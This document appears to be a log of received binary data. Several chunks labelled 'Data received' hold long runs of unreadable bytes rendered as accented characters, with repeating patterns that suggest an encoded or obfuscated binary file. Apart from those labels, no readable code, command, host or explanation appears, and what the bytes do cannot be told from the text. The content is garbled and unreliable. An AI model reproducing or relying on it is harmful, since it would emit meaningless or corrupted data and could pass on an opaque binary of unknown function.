X–¹DАòèÆØvP(ãµÔ'g|º(šm}æʂåšLz+z»%ãS¹8å8]W0t\W0t\W0t\ÜTƖ¸ï¼äqksÿ¿ö½ï»äÏ”º,Á3Éù+f|”ºüÁ3Ñú+pþÛåÚ+ã·×³P¨áä8’oðN×ä̱`îyî8®80šm‚çS/ãt\W0t\ÜTú*œx¾ïäܰ+ã8ÛµîÆˆÈ×+ÖÀ”¹LôŽä8+~KYìà;+ãµ××;>ݛ¹8”khšÕ¼èyW(F–²ô’SãKh¥<Ù¼ùµ*´<Ví°8+㵟'ä8”"`+ã¿X¿Éµæ3)„kóŽQÛãíR»+ã8šU>®%ãA×ä̳ä;+‰PˆÁä8’oüµW–±Lôñ8+ããÎÅ_Ïiø8]W0t\W0t\W0t\ÜTƖµß»ysäfp;ó{Óh?š(â딺 V-ë%Ô+³PÖÑä8œíðèy-¤8®80V-"Ô+éþ(—5û¿ŠP8Áä8’oüµWŁz+?t\W0t\W0t\ÜTú*œ@¾ïäܰ+ã8ÛgT ˆÈ×+Ö›ìîÁ”¹LôŽä8+~KŸíÈq×'ä8+òáQÍó-Ô3´³Ô3:ÿ}+*Û+ã½U/xx¬}8+9ÿ}(pÿÛqÿqÛë)+ã½U9ÿm)cÆä+h˜Ô·×´èyò¬8–ú·Ü3g|*i(À–29ÀpÿqÛg(+ã½U/9ÿm.cÇ}+—)n¼PBÐä8’oø¿Q¼¥·Ô³P¨ãä8’oøµÜ?˜³+ã8À‚µÜ;×wxP¶8–çSãèyý¹8aç8+p÷I3S~n*´Pèä8Á3Áÿ+?t\ÜTƖi0Ɩíºo*ã8Ñ¢{v)dFã8ãúqþ2æ:Î
Data received Ô'ÿm”ð£aT+˜ìì´Ô#¯ÿmxµ+ãÒo”³0É;ó‹«a(¿kt¨›÷*x•h¨ë*í¸ÆË”b0ƛt¨›tၛt¨›óQæºüïÓþ5`ä8‹¸…(ã82h¯{äÿ×jŸÕ¼ú"k) xxçЍ›t¨*jœÕȳ׉Љئ8y¯é86ût¨›T;z)ÕxñŏsRãµ@–æ¿Q¼å}Ɩ”<*mi?’ ãU–²<˜èüµ–²<˜ÑøµWÅ'µ@–æ¿Q¼å}ƖÔW¼ù½3+5š|û–öµþµWÅ'ÒctŒÕ+Ð÷*ã´h”k<šUg•*ã´^3!9*@•Ìà;šU]”*ã´V3ÏÞn*'ïš7·µH݋·ªÿå8–3P¼®ã8¼ü½ïåÏÝqµ!(ã8yùá8®š4–3P¶¯ã8ñŏçS/ãïš7ÿ®%Øû(âË Ûo*ãæS/ãîš8Sœ+ã½÷ãäæRÜT•7ÀµÔ|÷e¬$)•kä8®a4¾þÐÕ¸8x|ä8ފ JÂ}çi–ø š Ä³Ô'8šûv;:Ô+~÷m* 9ç'4–3„Ø+xxçìçm®™TR¹HÑ.¥8œÔPè½ã8”kiLxä9–¹L£Äµ–Ôµ_*ÉpìäµZ* íšzPËä8”kh{Ä컩wä8+—4š“T8+³P„·ä8”kh1šSÇ+ãµÔ¦µÜ?}çiæ4©ƒ9*ƒæÊP&0³#Ô+p÷y3Xôn*œÌtìä·Ô3´P£mä8]ފᚠœ8+c·ŽŸå8Þ¬+ãµaÀn˨9*cHx÷W¿öµY–4»p*ã8‘;ó‹æ&Ï;㰙(ã8Îŏ}ǖüá‘eø=+ãÌ;ã6ÝÆº8®³þÂt¨›t¨÷®ì+â‰á›t¨›3û(~vx 9ʂçR"ùì1íä8+cÌ*©øÊíäPå‘ã8Ën×xUÝq‹‘(ã8šxjäpò–&HxòS¼ˆÅ' QÅ'ïš7Šánü¤å×+~Cxá~9–ã”=h.šU÷}*ãV¼ÿµ_3v-+~@}-~y +ã8šâÎ*i0šûv;:Ô+~i]ƒæÌiü8ĖîÆ*©øÊíäµh3³n*HˬêÏ–2Pl6ã8-Ri3šUû+ãU–{ˆ+ãÙϖ<çxÒ8ÜTƖ½ïäÏ–¹0n{,8+Ex*㲗£å8Łz+ˆµ}®(ǖi0Ɩa4š-xqäfßi+:ÿm(æú”±HxÞh9–ú¿V¼ÙÏP'ïš7gTÂÇ–˵S¸4*ìðÌ®™@R¹D.¥8œÔP0¿ã8~r5ÔðÜhTiƒsUÜTÃݞ=’7ô·Ô~KW´Púã8n¼üµ_3ù8+sRãïš7gTފµ`þP5ã8n¼À·Ô|çe®(šW´P&ã8œìè´_ÛÏs*ã¿Q¿ÈµÜ#·9çâÎe3ˆè+|çe~åPyã8ϑ'åXiÌ8û/+z©ïäP•Éã8«Ëþ±Hx 9®™D®ÑðÊíä;ä ìÝ+ã†ùƺ8z;šS3D*ãၛt¨›yxç7;?ñƺ8+ã8y…9n‰µ}®4ÂÝKÉþã²ä?}Çmàbï¶þ1–À€”Fhà’Ìì;’¦l8ïÕÏi”§Ç–<P~Yã8›ìì¾Q¿ÞµÙ³k=۔µì#}ðᖤԚSßé吻̚ìð;ö5µÔä0šìô;íqý)æ—ÀíeÏe–aDِaD-¥ÐĄ–z„+ã J–4‡oå8z|+㵗kå8–<ŸSå8zp+ãµÔä(:Xÿ(ûµÔä((…ü;+aɜ­<8+¶µY3ˆj*@—*hôšÚüµ@ö‹(šÒð³Þ~p=ÚȳÖ~ÿ(ó@–¹0~iìô;3ƒH*xxç8nâq¶Y+ã8Æ3Ÿ@*ž$Æ3ªæn*ãҔzp+ãä8§KÙÏÆ=z+ˆµ}Ø·ánü¤å×+~Cxz9– ~×*åã”Fh+‘¦°8ä~uVìã;yۘ9–û¼µ_*Épìäµ^* ¿Q¼ýµ^3iM*’#æÏ”s +ã½(+h?"k¤±”+¬+ãµ–<µA¨9*#HxòS¼n*ãšZ´Pã"ã8¤ã;ϼûµZ3Ýn*ƒåXn‰µ}®$"k·îÆ–í¶ŽOå8àç)Ÿ=ä8Û|ÿn“¹Fx{9þê¾Q¿ÓèšZ1a*ãµÄ*þh˜Üã¦cå8¥ØÒ–3P3(ã8”ki,ǖ3PïNã8}T~ïn{å°Ô%>›ÜãµÔ%­‰(ã8ägxçÆ­©(ã8îÞ5šhëc`$=*hó¯Q¯$ÏÔà+ +ãÌç¯6Ïã–3PLã8úfT–0µáÖx›ì³Ô3}ÿ}¹HŸìèyç8Ýixuà8¯$Ï/þ$ø–.;šZ¶+ãµa3«¼n*ß±A(ã8šUßp-mÏx5hdÇo+—5¨?å8æ%Í–%èšZ\F*ãØÏÆ=}ǖµÜYn*ãæSãïš7÷34F*z+ˆµ}ØµîÆ–a0šZž;yóä8–PC®ã8=’4;+~i-m—2:;ŠP…]ã8},¡o*ãØÏP&0ÜT¨t;+~³](ã8*h—<"kÄ:hg@ô¾ðÒþ6ãf8gx6™=(ã8â$P®$)zÝ¡à+ãͱù CÀëJ•k UÕä?+–2P3æ?¥+ã8zùІUã8*m—6û.ÖjË"?:)ã8z ˜+ãͱç CÀëJm1@3ù01+ãæz¹0Ìiø8˽}ë·µ ‹þ¬ÌÆÝ‹Ò/”¹zú+³P{lä8’oðq×7ä8+!lìä·ìCuúëŒÞ˜ì$²Ô{ÿU‘¹4™ì9µÔXŸ´Œ}ÿe”¹xÀ*©¤Êíä9'ƒþ3ûñ+‚æÊP'ïš7÷áñ¬ÊíäÁ ˆtå×+[;åâÎØãÎ3–9*g|Ä&4ÜTƖáœe¸;+~ix z9–¹0š´;+¬(å~vx*9–3Pݒã8ñŁz+‰µ`3¶f*xxç~vx¸9¯$Ï®"\+ã8ï,:ÉÅ' QÅ' Që‚}ǖµÔ‰µ`®ì8ç:¾Å(ã8+ã8yk 9zà+ãUzì+㵗ßå8æzà+ãÌ–zà+ãUþ$æÌiø8ǖPŸBã8S¯¶É(ã8æ/ÖxÎn¾Å(ã8(­Œ;+h<šh:"k}¶É(ã8Ïn‰µ}«a0ފáš@hâœ~H;+"8+£µ
Data received c–kԔ=h+šU½n*ãÕÝ£Õ*ãâȖk ’MàÏ®â7å‰Pxâ8ú‰Pìïã8•oðµÞxsäfC¿ùP·†á8”Fi œÚ PøØã8Ôèߘã8+ŒÙÏÆ=}ŸÔP–7ã8øOÿ”¹PÀ3 +?ïš7е`*j<V-Ë%Ô+·ñ*ãA×äãå4Ç3öün*ãšm‚çS/ãïš7е`3¥l*êþ(—2û¿ŠP`îã8ËÀ~ÎÄ&<ÜTƖP&ã8Ÿìðèœìü蜕d8+ŠB*ãÙÌiü8ĖëÇÂqƒ‘+ã8û+pÿ–3èy89¬$Ì–”0z)ÖN—=h šílkxsåÌ8–ºÜšZ}ÿm”¹Dú+³PÞ<ã8UÕo*ãӁ+ã8Ç3’ýn*ã"=ƒµWÅ=z+‰µ`–º”ki0y'9–ºšë¤æRÜT•7ðíÇÂKxî'9–‚ÔšU}ÿmLxdù8¯$ÌþãT–ºÜš£œ³ì#yeäcÅ+—(n¼à´_38+9ý+˚­x8+xxî²Çm®ì=çâô–§0šÖøµ“¾•+ã8z/~ô—·¼ëšZ}¾•+ã8yï8–<¿X¿Ó½h(—‘ª°8š’@8+—?nëðU*¤Ô’Èü8À–2PÅ,ã8š­x8+xx‘ŠÇi‘0•Fi/’¥ô8î~vx&ø8¯$ϬãÏ–²ÜƱäP÷(ã8Ɩ2PŽ.ã8šUU+ã¼Q¿ø Q6úµ×ÏøùæìÏ–ìT©®Z¼+ã8šÄè¾J¿ø½ò/ã¸ìãÏÂvxù8ʂåXiø8ĖëÀ®™D”¹@øNúÛ}÷i–±0ù×Kú3TC*gÇm+i$y"%9«lô–|¤+ãµÔ'h?èðU(¤ÔXiø8û/+;­ïäP¹ïã88ñ*ã´I–?PÆ%ã8-ÅðÏæz¸+ãÏ–:Uޖ?P?ã8—kh?(»˜Ì/ÝuxVá8¬$Ï#³t8+8.*ãâ˜ì naD—kh4û(‰µY3¤E*@•Ôà8V‹îy¿á8–;Pïã8UÝK•¥ð8ä—Î*ã²×~vx{l8¯$Ì#–º<šÕð{p/$@¬$ÀÛÞ*ãÕ6úHèlÒôµ_3©À+~öÝ[~*ãÙRÜTÃ݋µ`3Æ9*ž;šU@x²ù8¯$ÌÖ3Pâ.ã8•ki+*%h7š¤üµ_°+ãU=Þqæ)–¯½n(— ’*ùÌ=±çã"k) ®qç2Ç–2ÒÂ9+ãån¼ðµ_ +ãÙÏP&0–º<šÕð{p/$@Û}÷m3#W*g9¼þ9ç'vxÚâ8±øà–.§Ä–ðU*i0šU4+ãµç³yNç:‚çSãïš7gTފáœè¬³Ü'"Fž<˜ìè´BÊ~=nh6’3åÌö;ϱýâz=ˬ6Ì÷–±Lm) ~÷m–4G¿øµc63°Ì#gF¿ù½o,h šèø–µ4šQ%Xhì?Á“@›ÜP4ã8Ôà¼o,h5n¼P´$ã8Ôà8ç#ãÎ3ô8+geä,~ÿe’¬ÙÏÆ=z+0©/ü3iún*KŸÅÀ·Ò/|ç}–<³Ô;‹Î*ã¼ô'ä¸ìãÏ®b¥óµ*¬ãÎ#–²4Ç3¢W*
Data received >ó¹ÞfS0"%X*ãÎL"%D*ãÏ®<’5øµû½x/êzl*ã8ç6ysäfI®;›-{1’0åÏ`–¸Ń}}.?t\–:½qxx¬8+~k•Hc{z—ÞœØ8+ãµnÍóÉÍóÉß™)þÝÄÞº‚÷b1÷béÍó¹Æ ™)îÊÔÞºšø÷’ÖÁÍóÉç˚)þ¥”Þª›ø÷bÉÁÍó¹æËš)·§«ä8”#¸+ãòäŽysäÊkS1ù¿C¿Å·Š+ã8>óÉ>óÉß)î)îÚô·ç p¹1Ñi_•HÃÌ!–%{{)—)š|!’Rø½W/fS¼µY®=å}>™¹ñؼ붵ã8+pó–¸Ń}ŸØ8+ãµnaô8+Þh=QµµS–<½p.—3›{!×Ò½Ïfh:å~.˜pΔc<Ù¼ãx0â83ô.+gxç.ÕxU3ß0+gxç+ãU{å}ǖ¸ìãÏ3¦0++ãˆÄ't\W0t\ÜTƖi0Ɩa4š-f@n¿ñµß/æi%«PB’â8íüµßæi%«ÙÏÄy™%ãw\W0t\W0t\W0t\ÜT•7ÀíšÄüîÆm¹9*×q×?å8+Ç.(ã³–4šîü·âÖ? ¹8ÇÛ}Ïa¹@x¯ã8*i(y#È8–¹0’oôµêéûÍiâ˜ìµÔ|ÿy”¹\›îà¼n%hӚÔì¶Ö)p<֖À»œ/dµÙ/|ÿ}¬=Ì– P›ã8 ({÷n¬$Àª¼U‘±9&gEn¼=¼X¿ÒU0R¹L+ã8zf9n¿ÂÐ ¹8Çaâ8*ux‡Ê8ÝãÎi3F*g|–¹LñŏµtÄ'µÔdò¾‘XçãgA¸8¿ÓÐA¸8y#«;®8<”kh%šü4Ô+~vú(âÎ*Épìä9F–iH•oüµÔ~÷–4Pã8šìðé—*ùÃþÝaS+ãµÔ‰9ç#}à3—F*÷}®80š]ó3?/+?ïš7ÿ–±4*hi<"k}•hù½Q,}(+h •YhTšÛåÀ(h4’kæ½P)gjçO` kgpÄ'Pz,ã8šS×x—Ph>(èÌ)Žk'ïš7Š9ç~Kxÿ DRúH5ìäµWŁz+ˆµ}ÝãΖP @à8Y- Ô+~~ÎÄ&<ÜTÆ*i0š8FH'ãpOÇÿ–:æÌiø8˽}~ÿ®=9Åþ³Ü'еÑ~mɐL&}ïi–”4šëü³ä7}ÿa¬$)•ˆä8–¨†šRß{-ijn¼Ì9&3÷=+Œã•kh*šìè¾Q¼ºµ×/~f›¤à²Ô#ãÎ*ªPc)ã8ÈÀxxäpþÛãÎ3/:+Œã*ìÈϬÏ5iLÙæaHåï÷m–‰@¼Uˆ=º,¼×NÐäÏ<–:U=–¹D=#¯Çi¢ÚNգϬ$Ï9=º,6ñµÒ~ø–ø€gëÈ;åÖxñŏsU=§,¼NÖäÏ|–'U}ÜTÃØÿ–‰(ÂÝøÂà–¼0"k}çm¬=Ì–¨½ÑàÊÌ+æ%Êeþ$¿X¿½·ë~,’–ë²Ä#*’iü² áÂÏ/¯Ì‘Ž;+ÅåÏ#®&:’mæ¼J¼ C6ÝP¾Éµì~,’=¦,¼ý+¿ðø*h–V%kƒæÊP'µW6ë$C®>;Ѭ6Ì–D-h–¦zI¯{åEÇm–ȱgéÈ<äYÏ–ö½Wfz‘μμJ¿ö²Ë(­æ¼ò½S)f~¯Ïuþ6U5½[(xjä£P¹"U‰–¹@}Ÿ‰µ}®šìð½X*·îƖ¤("*}Çi–³ìO}Çe–”4šëü³äG}ÿqaT›Ô~×*å³Ü3yx¯À;+~ –'Pæ¹Tæ âÎ *ªP#(ã8ÈÀxxäéñ.h=˜¼µ×/|ÏeH›ì9çâyä8À¼Qg§+ã·×³9çj+ããÈæ¹,¬z8+}ïn–?Ü;¯÷}z¡+ã¼C¿hµÔ?êûëÿa¼Ï¿Q¼ô²×Ç;gCÎxf[Æh˜Üã´ä?U;z ~Ïe–º šëðµ“ø–<{{)Ç;gXd[= "Q=4A“‰9”Yh•Phœíüèn¼üPÃ+ã8ÈÀy9ä,¬ÿy¼£µo¹PšÜã´Ô#÷aîÏMæX©ü9*xjäx9ä~q}éñ,hem}ÿi6 ¿Q¿ûµÔOyxç)ÖxñŏsUÜTƖi4"Y­î§óµÇ/~ÿ–ð:šíü=(~>i‚çRÜTìüµÄ®zäþgz®$0Â‘Ì XáÎÏ ¯Ì‘Œ;+ÁåÏ®$:’iæ¼J¼µP6ù%Q®<;ʬ$Ïxå²PÄ'ïš7ÿ–±4’Ëø8’Ëü8˜Óøq;ÇÿÄ'ïš7ÿ–±4’Ëø8’Ëü8˜ÓøqCÇÿÄ'Ò³ÜC×+â€%ã´ÄxjçÖxÔܘã8+ŒÙÏÆ=}•Ìà;š)~Àm–æ/~é–&P" %Xû`–»(šëø9ç[;äâ΂m*ã¼U&:ÜðGÙãÎА¼ûP¤&ã8},½l*ã¼Uxxç¬ÿ ¼´q×'â8*¾’küèÇ3;F*ãm;ÿm%ã80’9*ÿ}–ä X¨¬?+#)…h{U–™Pø#Çÿ”¹dÀ3á9*ãùïíþ6ÉÐ ¸8œìèy)â8ÀÐ ¹8œìèy#9W‰µ}–¹0”kh6,/þ¿ûèyª 8Àz+3+ã¿QgŽ-+ã}•ät×+âÎþ$}ÅÂt¨›t¨nüt×+~@xQõ8– ã’&ãϬÏȱã8'›Äþ3++Œã”ki<"FúDZÜÒ3_+~HËÀyNä‰9'›Äþ38++Œã”ki*"F·9'›Äþ3T++Œãz/~f%=ŠPxæä8Èŋ¨›t¨Ê}Íng ¹8n¼ç QnŠá›t¨›ã ¹8š;+ããǖ쫁›t¨”»;fCÏx5RƒæR³ñéÒ+š+㝁 ¹8È®ì8ç.ÕxU³øä×+³P*ã8ÈÀyxç?+ãUw{å}³›Äþ®ì8ä³P´ã8’s×+ââ¡(&Ò³dB×+ž%ã J–¹(šÓø¿Xg2+ãÈò¼(ã8šÛü¿C¼ü pJ+ãµ–i4”Pl?’mð=cD¤È¼X ÄN—%°+þ¹\—kh)šSã.Y)¸8nܵY6ÿµÔéz¿ÀµÙxs¯-8+xN¯U8+|6œÒüèÀ6«N(—’£Ì8¯M8+xN¯u8
Data received aX³Ä?gS¼ ½ì'äg×;h:HKÿDÌUþãfHÒy9ñ¿üÒ3Ö[*½w$ê|¿õN×Ã̱ÄP Hã8Ë®I%kyNÎwxÍP'µnÜTú+âÎ *i n¼È9çâÎ*i0y,ã8®8$Ìn9ǖµÔÖsÅþý˜ÓøµÔŠy+ãx›ÓüµÔ|ð–±(ghôÌ–¹0®šä8Q‹<ghæÌ–¹0®žä8Q®¼<=%;å~ÿju8kgð/éz¿ðµÔ"¶+#½Ù/ûNS—4šìüy€+ãx•Óø(šÔüðµh<f[×û®( èüµÜ~>këk%èü½qÔû–±0š-4Pi[×û®< èüµÜ~>P3çA@þ¥0’Kæ Ð~>šÔü{x,êk%èüRø¥0yÏ9–4NR(—1šÔü½ØóNR/—1šìü½ÙûNR—1šìü½ÙçNR—1šìü½ÙåNR —>šìü3É~>¨+ÿ8$Ì$ää<+—,+û8¿ðP¼ÝµÔf06ŵÜ~;’Kâ¼Y)|;z~÷–å½q$ÿ}};ÿ®ÄD-,8+ãP¿Ä)ã8å®{ç ~ÿ®Ä]}~÷–å½q2gp6ÿµÜ~;’K½Y|;šìüµÜ$[þü»pKã:øüµÔüà1®a¿ÐµÔfØ1Hÿ @äµÔ à–¹0ĵÔ~ç ®„Øp–¹0H. àÁ6®µÜ~û1®]•Sæ³Ð ~ÿ DäµÔà–¹0ĵÜ~ç –¥Ø’K½Y)|ûñ–¹0L.àÁ3f*qÿ۞;û+Ѝ›t¨–±0šèü¿ú½7%ûsüÌ®ÚEèü¿ú½7"ûsæÌ®ÚIèü¿ç½7J;«*9®=’3äÌ$®;å fP¿ñ½y(hã4+š-Ø9m*ã6ã8˜-(š-Ø9i*ã6/ã8z5Å.š($P®1’3äÌ®;åfP¼Î6ʵ%7)ã8z~>2iñ8+ã³®aÅh1Hè´c 6ùgÓÛ%ÎÆ}*‰µ}–¹0’#åÌ®$F•#åÁ 3A:n*;83+ã8Ìn¨*ãpã8Ä'µnÜTÜð½} Ösh­,T«jÿ¿üø’#ÁÄ`6ûµlxÎÔ+|÷u¬=Ì˹(˜ìµÔ|ÿ}–¹ ˜ìµÔ‰µä|ÿe–¹ù*ã;*i˜ìì´Ô|Ïq¹Dxü9”¹XÀ3=n*g|¬$ÏÝïn*ãâLììÙXnœ9+ã9çó5L*ã8çn*ãf× f|P'µnÜTÅÝ.ø‘+ã gÂÇ–;S”¾xöæ%Ïfä4+#÷®ìûä.8+ãUfä<+™S¿æµO–;ƒËä82hh,+Ã8¿Íëä8å®{ç!8+ãUeä:+?¯+ä8þ=µFè%R4µVh12h%Zh<[qS3ýPh=[qS3þP–3{p)$S%½p($I.<½v(þ{Rƒ5WÅÿ}ÍÄ'µnÜTÃÞçaä(+‰áb'µi‰D5!pS2æ‚)ã8û+»p+æ8¿ý[¿ð³ä'1Vìà;1+ãƒã82hh,+ç8¿Êã8å®{ç!8+ãU–Ueä;+Ös^¥kz–'@h:2h%Zh=[}S3çPh:[}S3øP)uk%U%½p($[®;hÿ}Rƒ5W¸DÎÆ=}*‰µ}–±0šh·îš8%P¨9ê$5acä4+ŠYh."*eC/ã8ådCã8å®pä/~Y}.8‘+ãU±¤åz,.ø‘+ãµW`ä=+Æ{ä  8+ãÌää:+—5*hi-®+ƒ86ðyëä8z,"81+ã X– û@1Çkm%P${r$X3µWh=2h%X3µWh?2hvSKü½w($S%½p($^h1hÿ~nÿqñŏçR–ãîš7µµÜ-8+ãíǖµPh:4+ãx¨8Qã…ã8;{Éh:2n%V¹Dú+‚»p+Ó8¿óZ¿øµN6ý…)ã8z)~bmÇzä  8+ãÌää:+—5*ii-®+ÿ86ðyã8z,"8+ã X– û@1~5X%P${r/$X3µWh?2hçx[~S3çP–2{p)f^%{{/f[h?hÿ~ìà4R:ÙÏÆ=}*‰µ}®Çž1Èþ$·ìK•H¼c÷Kÿq ¢+³P™$ã8•ä,â×+äµaÀa<"P7uDÔàºpkã;ؐm*ãâš[p•I£»p+â8h:XvSIú½pêÿkU%Z¨8+ã5@h6iƒ5WÅ=}*‰µ}صî"k‹Þ˜ìàfï'óÜ'×9•H£ñš8{S3æVX{p.ÆASMù5a–%{x.ÆqSKæ5a–%{x/ÆqkÿHhÇqS0ù{p/þH8­©Áº8ì/Öj}ò–Ì#ïi®ùšQzS3æVX{p.ÆiSHù5Y–&{x.ÆqSKæ5Y–&{x/ÆqkÿpiÇqS1ù{p/þpQ{SKü5Wh(hƒ5WÅ=}*‰µ}®Æ*i0y7á8Àž1b4·ìK Q>_cçKÿqþ4»sêÃ8þ&³ÔK ßq*i0y>à8®¡€Ëíä;È*pñ§Ï)¿Äà´Ô'e[P*ä84êä9$³Ô'ó–Ä'=}*‰µ}®Â݋µÌ~uS0ô½pê{X5P%=óŽQíÇ~5]%Xh?[{S3æ)§kÇ~SKç5A–%{x.òŽQ9{p)þhh%P)x5m%S3)§hÇ~Ÿ¤=Q±û5Aþ$ãbv Ïq–±\h×z•K£ Y±\KÌ{}f]і'µZX_)x5m%[h<S}S3æ)§kÇ~SKç5Y–'{x.òŽQ9{p)þpn%P)x5mÿpS6ù)§nÇ~kƒ5YੀËíäæÊ§Ê)¿Äà´Ô'g[Ñ®xh}ÿmQïmP't\W0t\W0t\W0t\ÜT•7ü½u;$5>óÆ0+ãsUÍó*Õç‚+ã8÷ÛPö÷xö–o$Íó_+™)9óÀÔ+™)9ÃÀÔ+™)9cÀÔ+™)9 ÓÀÔ+™)9ü¤ÀÔ+™)Åhš)Çnš)ÉKš)Toäaã8÷ۘ1¤¹8÷ۀ ¹8÷·Hö~öŒLöJb‹FöŒ|öÛXö‹~“Hã(+fS¨íF+ã)
Data received kÀøKÀø+Àø ÀøëÁøËÁø«Áø‹ÁøkÁøKÁø+Áø ÁøëÂøËÂø«Âø‹ÂøkÂøKÂø+Âø ÂøëÃøËÃø«Ãø‹ÃøkÃøKÃø+Ãø ÃøûÄøëÄøÛÄø»Äø›Äø‹ÄøkÄøKÄø+ÄøÄø+ã8+ã8„ ûÓ û³;û)3ûæpýÒ²üúü=Äü+ã8+ã8+ã8+ã8ãúâAýcžüpý+ã8+ã8+ã8ä8+ã8kä8+ã8×O_ÿ›Çø«ÇøuÿÿSû«ÇøɅÜ1ÌlÝô»hÓþµä8Vÿ›Çø«ÇøɅÜ1ȐÔþÎ…Ìøº’8+uÿ!VûoVûRûÛÙø×vÿnVûnVûíRûÛÙøƒvÿnVûnVûRûÛÙøvÿ½ ûl ûÜ ûé ûnVûÏwÿ˜ û2 ûÜ ûé ûnVû{wÿË ûw ûÔ ûá û±/û'wÿ+!û«ÇøÓHÿ^!û¼"ûsWÿ›Çø«ÇøGPÿ›Çø«Çø/Pÿ[Üø«Çø›Rÿ[Üø«ÇøËQÿkÞøËÞø»Þø Ùø«ÚøëÚøƒHÿi"û#û˜#ûù#û«ÚøëÚø¾mÍå̑8¼’ÕÿºkÖ1̖Êþ¹ä8OHÿ+!û«ÇøÿIÿ+!û«Çø¯Iÿ+!û«Çø_Iÿ+!û %ûɅÜ1ÍiÖò¿Éÿ †Ûý·ä8·ûÿ¯ûÿƒûÿsûÿgûÿ_ûÿ?ûÿã8ã8.ã8ã8(ã8ã8ã8Ï™ÎøÎ™þ¹ÄÊô¾“ÏãΙó¼—ð’Îð·Ü1ȖÑ䴙Öå+ã8µ“⼇Ð1»–Éò̗͵“Ì1̒É䲜ü̑Éã ä8º”ßãÈhÓþµÄÖþ¿ÄÈô¹‘Ó忙ܹ™Íþ¼–Ýô ‡ßðϐÉò¶ÄÁþ¼Ü1º‡Ýä¹ä8¹™Íþ¼–Ýô hÖð½…ÓýȆÔô —Êè „Ñð°’8+ã8,ã8ã8bä8ã8ã8ã8ºä8 ã8qä8ã8•ä8ã8Ùä8ã8>ç8,ã8?ç8,ã8<ç8,ã8ã8ã8âä8ã8Ïý8ã8˜ä8ðä8ä8ã8»ä8ã8Ûä8ã8)ã8)ã8òä8ã8ã8ã8ã8ã8(ã8óä8-ã8ã8¦ä8ã8Âä8ã8ã8òä8_ä8òä8®ä8ã8Mç8ã8ã8ã8ã8ã8ã8ã8ùä8¨ä8µä8,ã8Èý8ã8Nç8°ä8ã8ã8.ã8)ã8ã8,ã8ðõ8ã8\ø8ã8ã8,ã8 ã8ã8/ã8ã8ã8,ã8ã8ã8Ú8ã8ëÛ8Ïä8èÛ8Ìä8êÛ8Íä8üÛ8²ä8Ú8ã8ìÛ8±ä8ÔÛ8¶ä8íÛ8·ä8âÛ8´ä8Ú8ã8ØÛ8µä8ÿÛ8»ä8Ú8/ã8 Ú8ã8ÓÛ8¸ä8óÛ8ã8ãÛ8¾ä8ÚÛ8 ã8éÛ8¿ä8ïÛ8¼ä8îÛ8½ä8ÒÛ8¢ä8áÛ8¦ä8ÐÛ8¥ä8ýÛ8«ä8äÛ8©ä8æÛ8’ä8àÛ8“ä8×Û8‘ä8þÛ8—ä8Íä8;ðÿÏä8ðÿÌä8 ðÿ¸ä8ãñÿã8×ñÿã8Ïñÿã8§ñÿã8“ñÿ³ä8‡ñÿ ã8sñÿ±ä8ñÿ²ä8Sñÿ¶ä83ñÿ·ä8'ñÿã8ñÿ´ä8ñÿã8·ûÿðä8ïòÿã8Ãòÿã8»òÿã8§òÿ ã8—òÿóä8‹òÿµä8còÿºä8Wòÿñä8Kòÿã8#òÿ/ã8òÿã8¯ûÿã8óóÿ,ã8ãóÿã8ïóÿ¾ä8ßóÿ¿ä8Ïóÿ¼ä8¿óÿ½ä8¯óÿ¢ä8ƒóÿã8sóÿ ä8góÿòä8oóÿ£ä8Cóÿ¡ä8;óÿ¦ä8'óÿã8óÿ§ä8óÿ-ã8ãôÿã8ßôÿ)ã8Ïôÿ.ã8ƒûÿã8«ôÿ«ä8›ôÿ¤ä8‹ôÿ¥ä8{ôÿã8sûÿ¨ä8kôÿ°ä8[ôÿ»ä8Oôÿ(ã8gûÿ©ä8'ôÿ—ä8ôÿ¬ä8÷õÿã8ãõÿ­ä8×õÿ’ä8Çõÿã8¿õÿã8_ûÿã8?ûÿ ã8—õÿªä8‹õÿä8cõÿ–ä8Sõÿ‘ä8Cõÿã8Oõÿã8/õÿ ã8õÿ¹ä8óöÿ¯ä8Óöÿ“ä8ÃöÿȘÜã̗Í1Í…×ø·mÿºh⼔Èþ¹hßõ+ã8ȘÜã̗Í1°’侙8ȘÜã̗Í1µ“Ì1ÈjÛø·…ÚýÌä8ȐÊôȘÃ1ΓÖÿ̇ÌôÏä8ȖÑ䴙Öå ŸÓâ¿ÄÌþºÄÔþµ›8ȖÑ䴙Öå ’Ïå ’Þ1ϓ×ð°’8ɅÜ1ȘÜã̗ÍɅÜ1͝Ôô ‡ßâΖÓΐÊɅÜ1´™ÍâțßɖÉú̒ᰔßΓÖÿÌ‡Ìøº’ðɓÊå̘8ΓÖÿÌ‡Ìøº’ð·–ßðÏmøµÄÈ㺛Êô¾—8ΓÖÿÌ‡Ìøº’ã̚Ïâ̘8ΓÖÿÌ‡Ìøº’ã̗ßå+ã8ΖÉâ¾ÄÜô½Ýô ŸÓÿ¶ä8ϙÍ尒Û尓Ö1ȘÜã̗Í1¹™Ë䰖ßõ+ã8ϝÊôÎhÉã ÄÖþ¿Äßü»hÃÌlßò¼hÛó·™÷º–×ð¿Äß㹓Ê͝Ôô ˜Àø¾hÍ͝Ôô —Éþ ŸÛ㲙8͝Ôôµ…×ô —Éþ ŸÉÿ²ä8ÍiÖò¿Éÿ ‘Éå –ÏồÊå̘8³“Íå hÖã̅ÝùȆÔô+ã8°˜ßÿ¿ÞøÌ–ã̑Éç̘8°Ôô²…Ô1ÉmÌô –ß༙ÖòÌä8°’ÛỖÉṝÛåÌÄÓþ †Éÿ¿–Éý ’Èô¹…Ìøº’8°’Ìô¹–ÏῙܰ’Îð·Ü1¾™ß
Data received +ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+